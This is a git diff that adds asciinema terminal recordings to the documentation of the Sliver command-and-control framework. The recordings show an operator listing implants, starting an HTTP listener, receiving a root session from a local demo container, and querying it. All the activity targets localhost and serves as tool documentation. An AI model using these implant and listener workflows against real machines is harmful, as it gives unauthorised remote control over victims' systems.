"im\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[31.400583, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[31.407162, "o", "imp\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C\u001b[133D\u001b[12C\u001b[?25h"] +[31.439883, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[31.441738, "o", "\u001b[6n"] +[31.446467, "o", "impl\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[13D\u001b[9C\u001b[133D\u001b[13C\u001b[?25h"] +[31.583396, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[31.601804, "o", "impla\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[31.603767, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[14D\u001b[9C\u001b[133D\u001b[14C\u001b[?25h"] +[31.806544, "o", "\u001b[?25l"] +[31.80929, "o", "\u001b[133D"] +[31.810004, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[31.816866, "o", "implan\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[31.817852, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[15D\u001b[9C\u001b[133D\u001b[15C\u001b[?25h"] +[32.008794, "o", "\u001b[?25l\u001b[133D"] +[32.009806, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.013126, "o", "implant\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[32.013454, "o", "\u001b[133D\u001b[1A\u001b[16D\u001b[9C\u001b[133D\u001b[16C\u001b[?25h"] +[32.104441, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[32.111943, "o", "\u001b[1m\u001b[32mimplants\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[32.112485, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[17D\u001b[9C\u001b[133D\u001b[17C\u001b[?25h"] +[32.356544, "o", "\u001b[17D\u001b[9C\u001b[6n"] +[32.369004, "o", "\u001b[133D\u001b[17C\u001b[0J\u001b[133D\r\r\n"] +[32.370271, "o", "\u001b[0 q\r\n"] +[32.421383, "o", " Name Implant Type Template OS/Arch Format Command & Control Debug C2 Config ID Stage \r\n================ ============== ========== ============= ============ ======================= ======= =========== ======= =======\r\n ABSENT_CASE session sliver linux/amd64 EXECUTABLE [1] https://localhost true default 19437 false \r\n CURRENT_RESIST session sliver linux/amd64 EXECUTABLE [1] https://localhost true default 14578 false \r\n"] +[32.421644, "o", "\r\n\r\n\r\n"] +[32.438623, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[32.439156, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[32.439495, "o", "\u001b[6n"] +[32.441422, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[36.663526, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[36.669535, "o", "\u001b[6n"] +[36.672998, "o", "h\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[10D\u001b[9C\u001b[133D\u001b[10C\u001b[?25h"] +[36.873517, "o", "\u001b[?25l"] +[36.875463, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[36.880165, "o", "ht\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[37.047884, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.053712, "o", "htt\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[37.054317, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C\u001b[133D\u001b[12C\u001b[?25h"] +[37.134322, "o", "\u001b[?25l"] +[37.136007, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[37.140393, "o", "\u001b[1m\u001b[32mhttp\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[37.141529, "o", "\u001b[133D\u001b[1A\u001b[13D\u001b[9C\u001b[133D\u001b[13C\u001b[?25h"] +[37.55059, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[37.562464, "o", "\u001b[133D\u001b[13C\u001b[0J\u001b[133D\r\r\n"] +[37.563375, "o", "\u001b[0 q"] +[37.564303, "o", "\r\n"] +[37.576347, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mStarting HTTP :80 listener ...\r\n"] +[38.977973, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mSuccessfully started job #1\r\n"] +[38.97936, "o", "\r\n"] +[38.987122, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[38.987676, "o", "\u001b[6n"] +[38.989198, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[38.989573, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[40.426627, "o", "\u001b[?25l"] +[40.428614, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.436657, "o", "j\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[10D\u001b[9C\u001b[133D\u001b[10C\u001b[?25h"] +[40.558498, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[40.563147, "o", "\u001b[6n"] +[40.568809, "o", "jo\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[40.683903, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.693959, "o", "job\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[40.6944, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C\u001b[133D\u001b[12C\u001b[?25h"] +[40.820439, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[40.838956, "o", "\u001b[1m\u001b[32mjobs\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[13D\u001b[9C\u001b[133D\u001b[13C\u001b[?25h"] +[41.050519, "o", "\u001b[13D\u001b[9C"] +[41.052424, "o", "\u001b[6n"] +[41.05543, "o", "\u001b[133D\u001b[13C\u001b[0J\u001b[133D"] +[41.056888, "o", "\r\r\n"] +[41.065261, "o", "\u001b[0 q\r\n"] +[41.068263, "o", " ID Name Protocol Port Domains \r\n==== ====== ========== ====== =========\r\n 1 http tcp 80 \r\n\r\n"] +[41.082206, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[41.083159, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[41.085101, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[46.576392, "o", "\u001b[9D\u001b[9C\u001b[133D\u001b[0J\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mSession aab17db4 CURRENT_RESIST - 127.0.0.1:57018 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 12:50:22 UTC\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[46.577027, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[46.58099, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[49.50731, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[49.522489, "o", "s\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[49.524699, "o", "\u001b[10D\u001b[9C\u001b[133D\u001b[10C\u001b[?25h"] +[49.56783, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[49.569706, "o", "\u001b[6n"] +[49.575356, "o", "se\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[49.575726, "o", "\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[49.732625, "o", "\u001b[?25l"] +[49.740645, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[49.746465, "o", "ses\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C\u001b[133D\u001b[12C\u001b[?25h"] +[49.965551, "o", "\u001b[1 q"] +[50.00575, "o", "\u001b[1 q\u001b[?25l"] +[50.006394, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[50.00946, "o", "\u001b[1m\u001b[32msessions \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[18D\u001b[9C\u001b[133D\u001b[18C\u001b[?25h"] +[50.477529, "o", "\u001b[18D\u001b[9C"] +[50.479615, "o", "\u001b[6n"] +[50.48143, "o", "\u001b[133D"] +[50.482245, "o", "\u001b[18C\u001b[0J\u001b[133D\r\r\n"] +[50.483253, "o", "\u001b[0 q\r\n"] +[50.506415, "o", " ID Transport Remote Address Hostname Username Operating System Health \r\n========== =========== ================= ============== ========== ================== =========\r\n \u001b[0maab17db4\u001b[0m \u001b[0mhttp(s)\u001b[0m \u001b[0m127.0.0.1:57018\u001b[0m \u001b[0m98df0494f659\u001b[0m \u001b[0mroot\u001b[0m \u001b[0mlinux/amd64\u001b[0m \u001b[1m\u001b[32m[ALIVE]\u001b[0m \r\n"] +[50.507289, "o", "\r\n"] +[50.518471, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[50.518701, "o", "\u001b[1 q"] +[50.519867, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[50.52356, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[51.361832, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[51.373437, "o", "\u001b[6n"] +[51.378676, "o", "u\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[51.380281, "o", "\u001b[133D\u001b[1A\u001b[10D\u001b[9C\u001b[133D\u001b[10C\u001b[?25h"] +[51.561476, "o", "\u001b[?25l"] +[51.563647, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[51.566598, "o", "us\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[51.652895, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[51.659765, "o", "\u001b[1m\u001b[32muse\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[51.660431, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C\u001b[133D\u001b[12C\u001b[?25h"] +[51.744435, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[51.752027, "o", "\u001b[1m\u001b[32muse \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[51.754754, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[13D\u001b[9C\u001b[133D\u001b[13C\u001b[?25h"] +[52.069917, "o", "\u001b[13D\u001b[9C"] +[52.070633, "o", "\u001b[6n"] +[52.072503, "o", "\u001b[133D\u001b[13C\u001b[0J\u001b[133D\r\r\n"] +[52.072574, "o", "\u001b[0 q"] +[52.072962, "o", "\r\n"] +[52.085557, "o", "\u001b7\u001b[?25l"] +[52.08598, "o", "\u001b8\u001b[0G\u001b[2K"] +[52.090815, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m \u001b[0;36m[Use arrows to move, type to filter]\u001b[0m\r\n\u001b[0;1;36m> SESSION aab17db4 CURRENT_RESIST 127.0.0.1:57018 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[52.090951, "o", "\u001b7"] +[52.093491, "o", "\u001b[1A\u001b[0G"] +[52.693655, "o", "\u001b8"] +[52.694191, "o", "\u001b[?25h\u001b8"] +[52.695289, "o", "\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K\u001b[1A\u001b[0G\u001b[2K"] +[52.695799, "o", "\u001b[0;1;92m? \u001b[0m\u001b[0;1;99mSelect a session or beacon:\u001b[0m\u001b[0;36m SESSION aab17db4 CURRENT_RESIST 127.0.0.1:57018 98df0494f659 root linux/amd64\u001b[0m\r\n"] +[52.6964, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mActive session CURRENT_RESIST (aab17db4-0e6f-4e7f-a3e1-11ab464b708b)\r\n"] +[52.738705, "o", "\r\n"] +[52.751338, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[52.751906, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[52.754246, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[54.797821, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[54.815698, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D"] +[54.817569, "o", "\u001b[1A\u001b[27D\u001b[26C\u001b[133D\u001b[27C\u001b[?25h"] +[54.890283, "o", "\u001b[?25l\u001b[133D"] +[54.892394, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[54.897915, "o", "in\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[28D\u001b[26C\u001b[133D\u001b[28C\u001b[?25h"] +[54.970773, "o", "\u001b[?25l"] +[54.973705, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[54.979868, "o", "inf\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[54.981652, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[29D\u001b[26C\u001b[133D\u001b[29C\u001b[?25h"] +[55.118476, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > \u001b[6n"] +[55.125875, "o", "\u001b[1m\u001b[32minfo\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A"] +[55.129592, "o", "\u001b[30D\u001b[26C\u001b[133D\u001b[30C\u001b[?25h"] +[55.74862, "o", "\u001b[30D\u001b[26C\u001b[6n"] +[55.753894, "o", "\u001b[133D\u001b[30C\u001b[0J\u001b[133D\r\r\n"] +[55.755495, "o", "\u001b[0 q\r\n"] +[55.779941, "o", "\u001b[1m Session ID: \u001b[0maab17db4-0e6f-4e7f-a3e1-11ab464b708b\r\n\u001b[1m Name: \u001b[0mCURRENT_RESIST\r\n\u001b[1m Hostname: \u001b[0m98df0494f659\r\n\u001b[1m UUID: \u001b[0m3424b72e-e104-e99b-e183-dc60a7b751a0\r\n"] +[55.781949, "o", "\u001b[1m Username: \u001b[0mroot\r\n\u001b[1m UID: \u001b[0m0\r\n\u001b[1m GID: \u001b[0m0\r\n\u001b[1m PID: \u001b[0m7111\r\n\u001b[1m OS: \u001b[0mlinux\r\n"] +[55.783289, "o", "\u001b[1m Version: \u001b[0mLinux 98df0494f659 5.10.76-linuxkit\r\n\u001b[1m Locale: \u001b[0m\r\n\u001b[1m Arch: \u001b[0mamd64\r\n\u001b[1m Active C2: \u001b[0mhttps://localhost\r\n\u001b[1m Remote Address: \u001b[0m127.0.0.1:57018\r\n\u001b[1m Proxy URL: \u001b[0m\r\n\u001b[1mReconnect Interval: \u001b[0m1m0s\r\n"] +[55.784979, "o", "\u001b[1m First Contact: \u001b[0mWed May 1 12:50:22 UTC 2024 (10s ago)\r\n"] +[55.786374, "o", "\u001b[1m Last Checkin: \u001b[0mWed May 1 12:50:29 UTC 2024 (3s ago)\r\n\r\n"] +[55.803524, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[55.804204, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[31m (CURRENT_RESIST)\u001b[0m > "] +[55.804811, "o", "\u001b[6n"] +[55.806807, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[55.807933, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[26D\u001b[26C\u001b[133D\u001b[26C\u001b[?25h"] +[60.226139, "o", "\u001b[26D\u001b[26C\u001b[6n"] +[60.234569, "o", "\u001b[133D\u001b[26C\u001b[0J\u001b[133D\r\r\n"] +[60.236034, "o", "\u001b[0 q\r\n"] +[60.257361, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBackground ...\r\n"] +[60.258157, "o", "\r\n"] +[60.283122, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[60.283361, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[60.285647, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[60.286101, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[60.958386, "o", "\u001b[9D\u001b[9C\u001b[6n"] +[60.960274, "o", "\u001b[133D\u001b[9C\u001b[0J\u001b[133D\r\r\n"] +[60.961258, "o", "\u001b[0 q\r\n\r\n"] +[60.973846, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[60.974441, "o", "\u001b[1 q\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[60.97641, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[60.977183, "o", "\u001b[0J\u001b[133D\u001b[1A\u001b[9D\u001b[9C\u001b[133D\u001b[9C\u001b[?25h"] +[62.494268, "o", "\u001b[?25l"] +[62.506593, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.511467, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[62.513956, "o", "\u001b[133D\u001b[1A\u001b[10D\u001b[9C\u001b[133D\u001b[10C\u001b[?25h"] +[62.664344, "o", "\u001b[?25l"] +[62.671862, "o", "\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.675959, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[62.676128, "o", "\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[11D\u001b[9C\u001b[133D\u001b[11C\u001b[?25h"] +[62.771812, "o", "\u001b[?25l\u001b[133D"] +[62.773939, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[62.776462, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[12D\u001b[9C"] +[62.77694, "o", "\u001b[133D\u001b[12C\u001b[?25h"] +[62.885393, "o", "\u001b[?25l\u001b[133D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[62.886287, "o", "\u001b[6n"] +[62.889137, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[133D\u001b[1A\u001b[13D\u001b[9C\u001b[133D\u001b[13C\u001b[?25h"] +[63.035285, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[63.041412, "o", "\u001b[133D\u001b[13C\u001b[0J\u001b[133D\r\r\n"] +[63.044405, "o", "\u001b[0 q\r\n"] +[63.070815, "o", "Exiting...\r\n"] +[63.098434, "o", "\u001b[?2004hroot@98df0494f659:~# "] +[63.697379, "o", "\u001b[?2004l\r\r\n"] +[63.699022, "o", "exit\r\n"] diff --git a/docs/sliver-docs/public/asciinema/shell.cast b/docs/sliver-docs/public/asciinema/shell.cast new file mode 100644 index 0000000000..c7942603fc --- /dev/null +++ b/docs/sliver-docs/public/asciinema/shell.cast @@ -0,0 +1,254 @@ +{"version": 2, "width": 107, "height": 52, "timestamp": 1714578018, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.137029, "o", "\u001b[?2004h"] +[0.145121, "o", "root@98df0494f659:~# "] +[0.385004, "o", "."] +[0.451485, "o", "/"] +[0.634333, "o", "s"] +[0.740583, "o", "l"] +[0.82046, "o", "i"] +[0.864396, "o", "v"] +[0.984357, "o", "e"] +[1.071525, "o", "r"] +[1.201247, "o", "-"] +[1.303713, "o", "s"] +[1.362719, "o", "e"] +[1.410026, "o", "r"] +[1.617065, "o", "v"] +[1.703823, "o", "e"] +[1.805676, "o", "r"] +[1.863145, "o", "\r\n"] +[1.871716, "o", "\u001b[?2004l\r"] +[2.944371, "o", "\u001b[35m\r\r\n ****@@ @@**** \r\r\n @@@@@@***@ @***@@@@@@ \r\r\n @%%@@@%%#***@ @***#%%@@@%%@ \r\r\n %%%%%##%%%%****@ @****%%%%##%%%%% \r\r\n %%%%#####%%%%#*###@ @#####%%%%#####%%%% \r\r\n @%%%*@#####%%%%@####@ @####@%%%%#####@#%%%@ \r\r\n %%%+@**#####%%%%#####@ @#####%%%%#####**@+%%%@ \r\r\n #%%=+*+**###%#%%%###### ######%%%%%###**+*+=%%% \r\r\n %#%===++@*####%@@@@###### ######@@@@%####*@++===%%% \r\r\n @#@--===+**%%%@@@@@@#####%% %%#####@@@@@@%%#**+===--@#@ \r\r\n #@----%=+*%%%%@@@%%%"] +[2.945001, "o", "####%%%@ @ @ @%%%####%%%@@@%%%%*+=%----@# \r\r\n #%----=#++*%%%%@%%%%%@%%%%%%%%%@ @%%%%%%%%%@%%%%%@%%%%*++#=----%# \r\r\n %+----===+**@%%@#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@%%@**+===----+% \r\r\n @=----==++***@%@#%%%%%%%@%%%%@%%%%%%%%%%%%%%%%%%%%@%%%%@%%%%%%%#@%@***++==-----@ \r\r\n -----==+#%**##@@%%%@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@%%%@@##**%#+==----- \r\r\n %----==+**%%%%@@@#@%%%%%%%%%%@%%%%%%%%%%%%%%%%%%@%%%%%%%%%%@#@@@%%%%*++==----% \r\r\n =--#+=+**#@%%####%####%%%%@@@@@%%%%%%##%%%%%%@@@@@@%%%####%####%%@#**+=+#--= \r\r\n +-==+*%%%%########%#######%@@@@@@%%%%%#%%@@@@@@%#######%########%%%%*+==-= \r\r\n -----==++**#%######################%@@@%%%%@@@%######################%#**++==----- \r\r\n =--===+**######@##############%%%%%%%%%%%%%%%%%%%%##############@######**+===--= \r\r\n %-==+%@@@#######%%%%%%%%%@@%%%%%%%%%%%%%%%%%%%%%%%%@@"] +[2.945258, "o", "%%%%%%%%%#######@@@%+==-% \r\r\n @=@@@@@@@@#%%%%%%%%%%%%%%@@%%%%%%%%%%%%%%%%%%%%%%@@@%%%%%%%%%%%%%#@@@@@@@@=@ \r\r\n @@@@@@@@@@@@@%%%%%%%%%%%%@@@@%%%%%%%%**%%%%%%%%@@@@%%%%%%%%%%%%@@@@@@@@@@@@@ \r\r\n @@@@@@@@@@@@@@@@@%%#%@@%%%%@@@@@%%%%%@#**#@%%%%%@@@@@%%%%@@%#%%@@@@@@@@@@@@@@@@@ \r\r\n @@@@@@@@@@@@@@@@@@@@%#####%#%%%%%%%@%###**###%@%%%%%%%#######%@@@@@@@@@@@@@@@@@@@@ \r\r\n @@@@@@@@@@@@@@@@@@@@@@@*##%%%%%%%%%%%%%##**##%%%%%%%%%%%%###*@@@@@@@@@@@@@@@@@@@@@@@ \r\r\n @%%%%%@@@@@@@@@@@@@@@@@@@ %%%%%%%%%%%%%##**##%%%%%%%%%%%%% @@@@@@@@@@@@@@@@@@@%%%%%@ \r\r\n @%%%%%%%%%%%%%%@@@@@@@@@@@@ . %%%%%@%%%%%##**##%%%%%@%%%%% @@@@@@@@@@@@%%%%%%%%%%%%%%@ \r\r\n%%%%%%%@+. % :@%%%%%%%%@@@@@@@@@%@%%@@@@##**##@@@@%%@%@@@@@@@@@%%%%%%%%@: % ..+@%%%%%%% \r\r\n%#. . : .-@%%%%%@@@@@@@@@@@@@@##**##@@@@@@@@@@@@@@%%%%%@-. : .*% \r\r\n @%%@* #..:--=++*@%@@@@@@@@@@@@##**##@@@@@@@@@@@@@@*++==-:. # *@%%@ "] +[2.945305, "o", " \r\r\n%%%%%%@..*.:+% ..::+-==++++@-=@@@@@@@@@@@%####%@@@@@@@@@@@=-@++++==-+::.. #+:.*..@%%%%%% \r\r\n@###%.......::%-==++**#@++#*: .:-+@@@@@@@@@@%####%@@@@@@@@@@+-:. .*#++@#**++==-%::.......%###@ \r\r\n#%..........:::-==%+*******@* . .:-+@@@@@@@@@@####@@@@@@@@@@+-: #@*******+%=--:::..........%# \r\r\n@@@+:...::::--=++**@***##*==+ :-+@@@.@@@@%%##%%@@@@.@@@+-: ++=*##***@**++=--::::...:+@@@ \r\r\n @%%%***###%@#****##@##++++++. .:=*@+ @@@@%%##%%@@@@ =@*=:. .+++++=##@##****#@%###***%%%@ \r\r\n@@=====+++++***#####%%%%@++++**#.:=*@ .@@%%####%%@@. @*=:.#***+++@%%%%#####***+++++=====@@ \r\r\n @@@#+++++***##%%%%%***##%%*# @@*------*@@ #*%%##***%%%%%##***+++++#@@@ \r\r\n @@@@%%%@%%%%%. **--------** .%%%%%%%%%@@@@ \r\r\n @%%%% %@@@@@@@@@@@@@ %%%%@ \r\r\n @@ @::@@@@@@@@@@::@ @@ \r\r\n "] +[2.945361, "o", " -::::::@@@@::::::: \r\r\n *-----========-----+ \r\r\n @###%%%@@@@%%%###@ \r\r\n @%%%%%%@ \r\r\n\u001b[0m\r\nAll hackers gain cipher\r\r\n"] +[2.947373, "o", "\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n\r\n"] +[2.974764, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[2.976537, "o", "\u001b[1 q"] +[2.978132, "o", "\u001b[?25l"] +[2.978784, "o", "\u001b[107D"] +[2.979482, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[2.982362, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[2.982441, "o", "\r\r\n"] +[2.982915, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C\u001b[107D\u001b[9C\u001b[?25h"] +[4.258103, "o", "\u001b[9D\u001b[9C\u001b[107D\u001b[0J\r\u001b[2K\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mSession e783b0c4 CURRENT_RESIST - 127.0.0.1:60034 (98df0494f659) - linux/amd64 - Wed, 01 May 2024 15:40:22 